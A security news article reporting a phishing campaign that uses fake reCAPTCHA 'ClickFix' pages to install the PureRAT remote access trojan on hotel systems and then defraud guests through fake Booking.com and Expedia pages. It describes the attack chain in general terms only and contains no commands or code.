A sophisticated and ongoing phishing campaign has been observed targeting the global hospitality sector, leveraging the advanced “ClickFix” social engineering tactic to deploy PureRAT malware and steal sensitive credentials. This operation ultimately aims to defraud both hotel establishments and their customers, underscoring a growing threat to the travel industry’s digital infrastructure.
The campaign, active since at least April 2025, has focused on compromising accounts on major booking platforms like Booking.com and Expedia. Researchers at Sekoia identified that threat actors use compromised email accounts to send spear-phishing messages, mimicking legitimate communications from these platforms. This tactic highlights a concerning professionalization within cybercrime, where stolen booking data fuels a lucrative underground market.
The attack chain begins with deceptive emails that lure hotel staff to malicious websites employing the ClickFix social engineering technique. Victims are presented with a fake reCAPTCHA challenge or error message, instructing them to copy and execute a malicious PowerShell command. This command initiates a multi-stage infection process, which gathers system information and deploys a ZIP archive containing a binary. This binary then utilizes DLL side-loading to inject PureRAT, also known as zgRAT, into the compromised system.
PureRAT is a highly modular Remote Access Trojan (RAT) offering extensive capabilities, including remote access, keyboard and mouse control, webcam and microphone capture, keylogging, file transfer, and data exfiltration. The malware is further protected by .NET Reactor, which complicates reverse engineering efforts by security analysts, as reported by The Hacker News. Once PureRAT establishes persistence, attackers gain unauthorized access to critical booking management systems.
Stolen credentials from hotel systems are then exploited in two primary ways: they are either sold on cybercrime forums or directly leveraged to target hotel customers. In the latter scenario, guests receive fraudulent messages via WhatsApp or email, containing legitimate reservation details and prompting them to “verify” banking information to prevent booking cancellations. Unsuspecting customers are redirected to fake Booking.com or Expedia pages designed to harvest their card data, leading to financial fraud. The broader cybercrime ecosystem facilitates this fraud, with specialists known as “traffers” often outsourced for malware distribution, and “log checkers” used to validate stolen account credentials.
The ClickFix technique itself has evolved, with Push Security observing pages that include embedded videos, countdown timers, and adaptive instructions based on the victim’s operating system (Windows or macOS). These enhancements, combined with clipboard hijacking, make the lures more convincing and increase the likelihood of successful compromise. Microsoft has also tracked this activity under the moniker Storm-1865, emphasizing its global reach.
The proliferation of “as-a-service” models within cybercrime continues to lower entry barriers for attackers, reflecting a sophisticated and adaptive threat landscape that demands heightened vigilance from both the hospitality sector and its customers.